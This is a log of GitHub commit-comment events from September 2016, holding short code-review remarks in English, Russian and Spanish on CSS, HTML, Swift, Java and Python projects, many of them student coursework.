{"id":"4619768011","type":"CommitCommentEvent","actor":{"login":"govtcliq"},"repo":{"name":"govtcliq/govtcliq"},"payload":{"comment":{"id":19177911,"position":null,"line":null,"path":null,"commit_id":"300346949796a9df07c78a60904f421bcdb18a3c","created_at":"2016-09-26T19:02:01Z","updated_at":"2016-09-26T19:02:01Z","body":"[Govtcliq](http://govtcliq.in/)"}},"created_at":"2016-09-26T19:02:01Z"}
{"id":"4619777296","type":"CommitCommentEvent","actor":{"login":"strycore"},"repo":{"name":"Sunderland93/ffmpeg-nvenc"},"payload":{"comment":{"id":19177937,"position":37,"line":33,"path":"README.md","commit_id":"a7673ae6898da595460280dedd4d07ed5df2a9ed","created_at":"2016-09-26T19:03:40Z","updated_at":"2016-09-26T19:03:40Z","body":"LOL, nice try dude!"}},"created_at":"2016-09-26T19:03:40Z"}
{"id":"4619781413","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19177947,"position":10,"line":10,"path":"9/css/style.css","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:04:25Z","updated_at":"2016-09-26T19:04:25Z","body":"такс такс такс...\r\nи от чьей высоты наследует высоту `.wrapper`?\r\nот `body`?\r\nи где же высота `body` в таком случае?"}},"created_at":"2016-09-26T19:04:25Z"}
{"id":"4619783907","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19177959,"position":7,"line":25,"path":"package.json","commit_id":"93a1bb0a925de436d48d57f4289f419d27b02a3b","created_at":"2016-09-26T19:04:53Z","updated_at":"2016-09-26T19:04:53Z","body":"Tip: use [`unist-util-visit`](https://github.com/wooorm/unist-util-visit), it’s much faster for simple selectors."}},"created_at":"2016-09-26T19:04:53Z"}
{"id":"4619789221","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"dhexonian/dsp"},"payload":{"comment":{"id":19177976,"position":null,"line":null,"path":null,"commit_id":"7280f4e8a273e9f8ea57a3b09ae97148c67d653b","created_at":"2016-09-26T19:05:51Z","updated_at":"2016-09-26T19:05:51Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @dhexonian \r\n\r\nExcellent work on advanced Python! Only one comment:\r\n- In Q1, don't forget to `import re`.\r\n\r\n👍 "}},"created_at":"2016-09-26T19:05:51Z"}
{"id":"4619790440","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19177979,"position":5,"line":23,"path":"index.js","commit_id":"1916a393626a372b518fc790a2229827701db676","created_at":"2016-09-26T19:06:05Z","updated_at":"2016-09-26T19:06:05Z","body":"Maybe add support for passing the incrementer as `options` in the attacher?\r\n\r\n> should we refuse if the depth is 6\r\n\r\nIMO, yes, or make it a `<p>`."}},"created_at":"2016-09-26T19:06:05Z"}
{"id":"4619792405","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19177990,"position":13,"line":13,"path":"README.md","commit_id":"5faed606cea9d2e700de6dcab68dcbd49228babc","created_at":"2016-09-26T19:06:26Z","updated_at":"2016-09-26T19:06:26Z","body":"The example doesn’t need remark-html"}},"created_at":"2016-09-26T19:06:26Z"}
{"id":"4619794114","type":"CommitCommentEvent","actor":{"login":"alexandr-san4ez"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19177998,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-26T19:06:46Z","updated_at":"2016-09-26T19:06:46Z","body":"@Stanzilla i had this problem.\r\nAfter execution command: `git add *` git continues to operate without closing. The process does not stop."}},"created_at":"2016-09-26T19:06:46Z"}
{"id":"4619798646","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19178007,"position":23,"line":23,"path":"README.md","commit_id":"5faed606cea9d2e700de6dcab68dcbd49228babc","created_at":"2016-09-26T19:07:35Z","updated_at":"2016-09-26T19:07:35Z","body":"You should escape the single quote in `one'll`"}},"created_at":"2016-09-26T19:07:35Z"}
{"id":"4619801943","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178016,"position":63,"line":63,"path":"9/css/style.css","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:08:11Z","updated_at":"2016-09-26T19:08:11Z","body":"нужно позиционировать элемент, если ты хочешь, чтобы у него появился доступ к свойству `bottom`. Сейчас твои ссылки, а с ними и ячейки, а с ними и строки таблицы скачут, что не есть хорошо"}},"created_at":"2016-09-26T19:08:11Z"}
{"id":"4619802807","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178020,"position":4,"line":10,"path":"EZSwiftExtensionsTests/NSDateTests.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:08:20Z","updated_at":"2016-09-26T19:08:20Z","body":"Whats this?"}},"created_at":"2016-09-26T19:08:20Z"}
{"id":"4619803262","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19178022,"position":null,"line":null,"path":null,"commit_id":"2b022d9a04c2856025e7f9f375bbaaadd38f46d2","created_at":"2016-09-26T19:08:25Z","updated_at":"2016-09-26T19:08:25Z","body":"wtf"}},"created_at":"2016-09-26T19:08:25Z"}
{"id":"4619803965","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178025,"position":1,"line":1,"path":"9/font/montserrat-light-demo.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:08:33Z","updated_at":"2016-09-26T19:08:33Z","body":"а этот файл что забыл в коммите?"}},"created_at":"2016-09-26T19:08:33Z"}
{"id":"4619806339","type":"CommitCommentEvent","actor":{"login":"arturtsh"},"repo":{"name":"arturtsh/cs110_hw2"},"payload":{"comment":{"id":19178033,"position":null,"line":null,"path":null,"commit_id":"210635d711f710e75525ab53cdfcd22d6d2fefc6","created_at":"2016-09-26T19:08:59Z","updated_at":"2016-09-26T19:08:59Z","body":"youtube link to stars https://www.youtube.com/watch?v=q40aOEiXc_Y&feature=youtu.be"}},"created_at":"2016-09-26T19:08:59Z"}
{"id":"4619810021","type":"CommitCommentEvent","actor":{"login":"jsanda"},"repo":{"name":"hawkular/hawkular-metrics"},"payload":{"comment":{"id":19178040,"position":5,"line":186,"path":"job-scheduler/src/main/java/org/hawkular/metrics/scheduler/impl/SchedulerImpl.java","commit_id":"f4e91789a6250b0f3e2a2641c31b63a54d4b9646","created_at":"2016-09-26T19:09:41Z","updated_at":"2016-09-26T19:09:41Z","body":"I sure did :)"}},"created_at":"2016-09-26T19:09:41Z"}
{"id":"4619810766","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19178044,"position":26,"line":26,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Deck.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T19:09:50Z","updated_at":"2016-09-26T19:09:50Z","body":"Лучше использовать Collections.shuffle(this.deckOfCards);"}},"created_at":"2016-09-26T19:09:50Z"}
{"id":"4619811256","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178045,"position":63,"line":63,"path":"9/css/style.css","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:09:56Z","updated_at":"2016-09-26T19:09:56Z","body":"и `hover` нужно вешать на ссылку, а не на ячейку таблицы"}},"created_at":"2016-09-26T19:09:56Z"}
{"id":"4619814030","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178056,"position":20,"line":20,"path":"9/index.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:10:27Z","updated_at":"2016-09-26T19:10:27Z","body":"завтра"}},"created_at":"2016-09-26T19:10:27Z"}
{"id":"4619814428","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178057,"position":24,"line":24,"path":"9/index.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:10:32Z","updated_at":"2016-09-26T19:10:32Z","body":"мы"}},"created_at":"2016-09-26T19:10:32Z"}
{"id":"4619815040","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178059,"position":28,"line":28,"path":"9/index.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:10:39Z","updated_at":"2016-09-26T19:10:39Z","body":"садимся"}},"created_at":"2016-09-26T19:10:39Z"}
{"id":"4619815938","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178060,"position":32,"line":32,"path":"9/index.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:10:49Z","updated_at":"2016-09-26T19:10:49Z","body":"и верстаем"}},"created_at":"2016-09-26T19:10:49Z"}
{"id":"4619816315","type":"CommitCommentEvent","actor":{"login":"Ornim"},"repo":{"name":"Sunderland93/ffmpeg-nvenc"},"payload":{"comment":{"id":19178061,"position":37,"line":33,"path":"README.md","commit_id":"a7673ae6898da595460280dedd4d07ed5df2a9ed","created_at":"2016-09-26T19:10:53Z","updated_at":"2016-09-26T19:10:53Z","body":"@strycore is good comrade"}},"created_at":"2016-09-26T19:10:53Z"}
{"id":"4619816421","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19178063,"position":null,"line":null,"path":null,"commit_id":"d03a286f6fc06b99308b784dcc52b68c5cf69770","created_at":"2016-09-26T19:10:54Z","updated_at":"2016-09-26T19:10:54Z","body":"Arg. Still crash `develop.n10.as` if our db has not been populated at all... To fix & also possibly create a post install script to initiate the db/flush the db."}},"created_at":"2016-09-26T19:10:54Z"}
{"id":"4619817042","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178065,"position":36,"line":36,"path":"9/index.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:11:01Z","updated_at":"2016-09-26T19:11:01Z","body":"вдвоем"}},"created_at":"2016-09-26T19:11:01Z"}
{"id":"4619817104","type":"CommitCommentEvent","actor":{"login":"Dennyfentow"},"repo":{"name":"Dennyfentow/Carrinho"},"payload":{"comment":{"id":19178066,"position":null,"line":null,"path":null,"commit_id":"e8446add0d46fefd5f34d9c3edcd67c292c0a424","created_at":"2016-09-26T19:11:02Z","updated_at":"2016-09-26T19:11:02Z","body":"Comit"}},"created_at":"2016-09-26T19:11:02Z"}
{"id":"4619818041","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178067,"position":40,"line":40,"path":"9/index.html","commit_id":"3038721362c78ed5d4d61a031b4ca36a892c86fe","created_at":"2016-09-26T19:11:13Z","updated_at":"2016-09-26T19:11:13Z","body":"ссылки!!!"}},"created_at":"2016-09-26T19:11:13Z"}
{"id":"4619818864","type":"CommitCommentEvent","actor":{"login":"ploki"},"repo":{"name":"nfs-ganesha/nfs-ganesha"},"payload":{"comment":{"id":19178069,"position":null,"line":null,"path":null,"commit_id":"0c209a710292e24a867a6e9b9281a89563fdb148","created_at":"2016-09-26T19:11:22Z","updated_at":"2016-09-26T19:11:22Z","body":"congrats!"}},"created_at":"2016-09-26T19:11:22Z"}
{"id":"4619820737","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19178072,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-26T19:11:45Z","updated_at":"2016-09-26T19:11:45Z","body":"Cool thanks!\n\nOn Mon, 26 Sep 2016, 19:26 Kees Kluskens, <notifications@github.com> wrote:\n\n> @toxicFork <https://github.com/toxicFork>, fyi, 1.8.3 was just released\n> with the fix.\n>\n> —\n> You are receiving this because you were mentioned.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/webpack/webpack-dev-middleware/commit/e8962937b537d8b080c5939b6c04fbeb9d5277fe#commitcomment-19177200>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA0iLSGjrKqX724QRGDEYMJrRelvNXNSks5quA5LgaJpZM4KF5pi>\n> .\n>\n"}},"created_at":"2016-09-26T19:11:45Z"}
{"id":"4619821181","type":"CommitCommentEvent","actor":{"login":"MajorCooke"},"repo":{"name":"MajorCooke/zdoom"},"payload":{"comment":{"id":19178077,"position":14,"line":1425,"path":"src/r_things.cpp","commit_id":"e16be40acdcc7cff7e0eccebefda90574b0707ad","created_at":"2016-09-26T19:11:51Z","updated_at":"2016-09-26T19:11:51Z","body":"Doesn't help."}},"created_at":"2016-09-26T19:11:51Z"}
{"id":"4619824218","type":"CommitCommentEvent","actor":{"login":"mtgibbs"},"repo":{"name":"nHydrate/nHydrate"},"payload":{"comment":{"id":19178083,"position":null,"line":null,"path":null,"commit_id":"e6b15db9ed74b99b8a888580f9a3db49b9820122","created_at":"2016-09-26T19:12:24Z","updated_at":"2016-09-26T19:12:24Z","body":"Reference Issue #30"}},"created_at":"2016-09-26T19:12:24Z"}
{"id":"4619825156","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178088,"position":5,"line":23,"path":"EZSwiftExtensionsTests/StringTests.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:12:34Z","updated_at":"2016-09-26T19:12:34Z","body":"Why change this?"}},"created_at":"2016-09-26T19:12:34Z"}
{"id":"4619827620","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19178091,"position":35,"line":35,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Deck.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T19:13:03Z","updated_at":"2016-09-26T19:13:03Z","body":"Лучше использовать Collections.shuffle(this.deckOfCards);"}},"created_at":"2016-09-26T19:13:03Z"}
{"id":"4619827850","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178094,"position":4,"line":10,"path":"EZSwiftExtensionsTests/NSDateTests.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:13:06Z","updated_at":"2016-09-26T19:13:06Z","body":"This is what doesn't need to be here... Hm.. This should be removed."}},"created_at":"2016-09-26T19:13:06Z"}
{"id":"4619829840","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19178098,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-26T19:13:27Z","updated_at":"2016-09-26T19:13:27Z","body":"Hi thanks for the great work! i 'll try for test!"}},"created_at":"2016-09-26T19:13:27Z"}
{"id":"4619831253","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19178101,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T19:13:44Z","updated_at":"2016-09-26T19:13:44Z","body":"That was my original thought since the splash will be covered by the browser but if the browser is minimised it will look really bad...\r\nMaybe use ```xdotool getactivewindow getwindowname``` instead but xdotool is not in puppies by default. 😞  "}},"created_at":"2016-09-26T19:13:44Z"}
{"id":"4619838389","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178124,"position":4,"line":9,"path":"Sources/ArrayExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:15:04Z","updated_at":"2016-09-26T19:15:04Z","body":"Whats this and why is it private?"}},"created_at":"2016-09-26T19:15:04Z"}
{"id":"4619839092","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178126,"position":5,"line":23,"path":"EZSwiftExtensionsTests/StringTests.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:15:13Z","updated_at":"2016-09-26T19:15:13Z","body":"@goktugyil String doesn't accept CountableClosedRange anymore, only half open range. This is just to make work what was written. I feel like we should have overloaded subscript with CountableClosedRange for Collections."}},"created_at":"2016-09-26T19:15:13Z"}
{"id":"4619840000","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178129,"position":15,"line":20,"path":"Sources/ArrayExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:15:22Z","updated_at":"2016-09-26T19:15:22Z","body":"Whats this and why is it private?\r\n"}},"created_at":"2016-09-26T19:15:22Z"}
{"id":"4619840370","type":"CommitCommentEvent","actor":{"login":"alexyaoyang"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19178131,"position":39,"line":86,"path":"pokemongo_bot/cell_workers/evolve_pokemon.py","commit_id":"c53a57e9a2fc43844e62c6492883b5346042e5c3","created_at":"2016-09-26T19:15:26Z","updated_at":"2016-09-26T19:15:26Z","body":"@thejamespinto Typo, should be `needs`. I thought you tested your changes? "}},"created_at":"2016-09-26T19:15:26Z"}
{"id":"4619841943","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19178136,"position":43,"line":43,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Deck.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T19:15:44Z","updated_at":"2016-09-26T19:15:44Z","body":"Лучше написать\r\nCard top = this.deckOfCards.remove(this.deckOfCards.size() - 1);\r\nhand.addCard(top);\r\nА поле numCards вообще удалить."}},"created_at":"2016-09-26T19:15:44Z"}
{"id":"4619843501","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":19178139,"position":null,"line":null,"path":null,"commit_id":"5d2096d08226db1622aec0a5b0eb39ef2de9edc6","created_at":"2016-09-26T19:16:03Z","updated_at":"2016-09-26T19:16:03Z","body":"слишком неряшливо\r\n![clip2net_160926221448](https://cloud.githubusercontent.com/assets/20847284/18848386/cc6c8936-8436-11e6-9634-bb669f8c1767.png)\r\n"}},"created_at":"2016-09-26T19:16:03Z"}
{"id":"4619849283","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19178159,"position":34,"line":34,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Hand.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T19:17:07Z","updated_at":"2016-09-26T19:17:07Z","body":"Неиспользуемый метод. Надо удалить."}},"created_at":"2016-09-26T19:17:07Z"}
{"id":"4619850474","type":"CommitCommentEvent","actor":{"login":"vnessified"},"repo":{"name":"vnessified/git_excited"},"payload":{"comment":{"id":19178166,"position":null,"line":null,"path":null,"commit_id":"cb71baf7be2f1525e3e5818590e072cef055d54f","created_at":"2016-09-26T19:17:21Z","updated_at":"2016-09-26T19:17:21Z","body":"what'd you do?"}},"created_at":"2016-09-26T19:17:21Z"}
{"id":"4619850580","type":"CommitCommentEvent","actor":{"login":"DinkyDyeAussie"},"repo":{"name":"Wargus/stratagus"},"payload":{"comment":{"id":19178168,"position":null,"line":null,"path":null,"commit_id":"8b779e6e2b3cbb090d50049314f7a18cec875f87","created_at":"2016-09-26T19:17:23Z","updated_at":"2016-09-26T19:17:23Z","body":"Its just commented out. The developer themselves can just uncomment it to re-enable it."}},"created_at":"2016-09-26T19:17:23Z"}
{"id":"4619852078","type":"CommitCommentEvent","actor":{"login":"vnessified"},"repo":{"name":"vnessified/git_excited"},"payload":{"comment":{"id":19178179,"position":null,"line":null,"path":null,"commit_id":"cb71baf7be2f1525e3e5818590e072cef055d54f","created_at":"2016-09-26T19:17:40Z","updated_at":"2016-09-26T19:17:40Z","body":"try harder to break it"}},"created_at":"2016-09-26T19:17:40Z"}
{"id":"4619855277","type":"CommitCommentEvent","actor":{"login":"ensiform"},"repo":{"name":"JACoders/OpenJK"},"payload":{"comment":{"id":19178191,"position":null,"line":null,"path":null,"commit_id":"8ea096c529c525db3bd2babe3c1a9cc0e230e58d","created_at":"2016-09-26T19:18:16Z","updated_at":"2016-09-26T19:18:16Z","body":"is %ld valid msvc printf formatting?"}},"created_at":"2016-09-26T19:18:16Z"}
{"id":"4619856705","type":"CommitCommentEvent","actor":{"login":"drona13"},"repo":{"name":"timilsinasantosh/AssignmentProject"},"payload":{"comment":{"id":19178193,"position":null,"line":null,"path":null,"commit_id":"a49c1fa4cd40a3d4ac01634f9869e32287cc3b2c","created_at":"2016-09-26T19:18:30Z","updated_at":"2016-09-26T19:18:30Z","body":"hello"}},"created_at":"2016-09-26T19:18:30Z"}
{"id":"4619857486","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":19178196,"position":79,"line":79,"path":"blackjack/src/main/java/org/bigj/blackjack/service/Hand.java","commit_id":"ab9f64b4f77b1a1932f4bd256d93ad17c981609d","created_at":"2016-09-26T19:18:39Z","updated_at":"2016-09-26T19:18:39Z","body":"Метод не используется."}},"created_at":"2016-09-26T19:18:39Z"}
{"id":"4619859690","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19178202,"position":null,"line":null,"path":null,"commit_id":"8366c5700159ae8072f298f724b4d7f8002887d4","created_at":"2016-09-26T19:19:04Z","updated_at":"2016-09-26T19:19:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#BNUh3UvYSyOXiewap7tDww"}},"created_at":"2016-09-26T19:19:04Z"}
{"id":"4619866517","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nevinchany-ilya/lemon-school"},"payload":{"comment":{"id":19178217,"position":null,"line":null,"path":null,"commit_id":"2da97666031396fa352226224cfa3ae1d9b7d856","created_at":"2016-09-26T19:20:20Z","updated_at":"2016-09-26T19:20:20Z","body":"невалидная таблица, не по макету, тень потерял, градиент потерял, таблица не по горизонтальному центру страницы"}},"created_at":"2016-09-26T19:20:20Z"}
{"id":"4619870895","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"Pablo2147/Trabajos-Practicos"},"payload":{"comment":{"id":19178239,"position":null,"line":null,"path":null,"commit_id":"efa2ee21ada326bbd757a27e39d274fa673bbb04","created_at":"2016-09-26T19:21:08Z","updated_at":"2016-09-26T19:21:08Z","body":"Gran trabajo!"}},"created_at":"2016-09-26T19:21:08Z"}
{"id":"4619873504","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"dhexonian/dsp"},"payload":{"comment":{"id":19178251,"position":null,"line":null,"path":null,"commit_id":"ff1ad5bbf096243cbd280b9a481ed09f30f25a96","created_at":"2016-09-26T19:21:36Z","updated_at":"2016-09-26T19:21:36Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @dhexonian \r\n\r\nNice work on algebra!\r\n- `u.dot(v)` does not work if `u` and `v` have the same shape ((1,4) in this case). Try `np.inner(u,v)` instead, or `u.dot(v.T)`.\r\n\r\n👍 "}},"created_at":"2016-09-26T19:21:36Z"}
{"id":"4619878054","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19178262,"position":null,"line":null,"path":null,"commit_id":"1ac37c1679f272f0c1f334c96c8e15241dca6e5b","created_at":"2016-09-26T19:22:28Z","updated_at":"2016-09-26T19:22:28Z","body":"Thanks, @dkasak!\r\nFixed in https://github.com/neomake/neomake/pull/647.\r\nYou can really see that I did not pay much attention to the test.. :/"}},"created_at":"2016-09-26T19:22:28Z"}
{"id":"4619883941","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"Cb4ss/CH-clase-01"},"payload":{"comment":{"id":19178275,"position":null,"line":null,"path":null,"commit_id":"9938a9cf0de8470e09369ca867b93ef2dc9aab01","created_at":"2016-09-26T19:23:35Z","updated_at":"2016-09-26T19:23:35Z","body":"Está muy bien, recuerda en las próximas clases, eliminar los <br> dado que tienes algunos que no están dentro de texto. Los reemplazaremos con css."}},"created_at":"2016-09-26T19:23:35Z"}
{"id":"4619885132","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178282,"position":4,"line":9,"path":"Sources/ArrayExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:23:48Z","updated_at":"2016-09-26T19:23:48Z","body":"added by migrator, should be removed"}},"created_at":"2016-09-26T19:23:48Z"}
{"id":"4619886954","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178286,"position":15,"line":20,"path":"Sources/ArrayExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:24:08Z","updated_at":"2016-09-26T19:24:08Z","body":"added by migrator should be removed"}},"created_at":"2016-09-26T19:24:08Z"}
{"id":"4619888639","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"galina-palyukh/lemon-school"},"payload":{"comment":{"id":19178292,"position":20,"line":20,"path":"9/style.css","commit_id":"3ceabfa2b072612352daafdc397ea417f93e6cc4","created_at":"2016-09-26T19:24:27Z","updated_at":"2016-09-26T19:24:27Z","body":"где тень таблицы?"}},"created_at":"2016-09-26T19:24:27Z"}
{"id":"4619889940","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"galina-palyukh/lemon-school"},"payload":{"comment":{"id":19178295,"position":26,"line":26,"path":"9/style.css","commit_id":"3ceabfa2b072612352daafdc397ea417f93e6cc4","created_at":"2016-09-26T19:24:42Z","updated_at":"2016-09-26T19:24:42Z","body":"подразумевался отдельный ховер на ссылку"}},"created_at":"2016-09-26T19:24:42Z"}
{"id":"4619890303","type":"CommitCommentEvent","actor":{"login":"olegkonopka"},"repo":{"name":"olegkonopka/backbone_task_manager"},"payload":{"comment":{"id":19178296,"position":null,"line":null,"path":null,"commit_id":"07f9c5cd66febb5087a9d316cd565ba28bf64166","created_at":"2016-09-26T19:24:46Z","updated_at":"2016-09-26T19:24:46Z","body":"Thats nice!"}},"created_at":"2016-09-26T19:24:46Z"}
{"id":"4619893036","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"mantune1/ch-clase1"},"payload":{"comment":{"id":19178306,"position":null,"line":null,"path":null,"commit_id":"da6ba9efe218c29360c4d996490ac6c699351a19","created_at":"2016-09-26T19:25:18Z","updated_at":"2016-09-26T19:25:18Z","body":"👍 "}},"created_at":"2016-09-26T19:25:18Z"}
{"id":"4619896094","type":"CommitCommentEvent","actor":{"login":"xlw2180667"},"repo":{"name":"xlw2180667/codilityAnswers"},"payload":{"comment":{"id":19178322,"position":4,"line":184,"path":"ViewController.swift","commit_id":"f5805650e70b950dbceef012166ed0cb34bafd6c","created_at":"2016-09-26T19:25:53Z","updated_at":"2016-09-26T19:25:53Z","body":"Answers for 1 - 4.2"}},"created_at":"2016-09-26T19:25:53Z"}
{"id":"4619897223","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"jaimezegpi/primer_ejercicio"},"payload":{"comment":{"id":19178326,"position":null,"line":null,"path":null,"commit_id":"f1e560de227a20016614e9fb940255e4031ef84b","created_at":"2016-09-26T19:26:07Z","updated_at":"2016-09-26T19:26:07Z","body":"Muy bien el formulario."}},"created_at":"2016-09-26T19:26:07Z"}
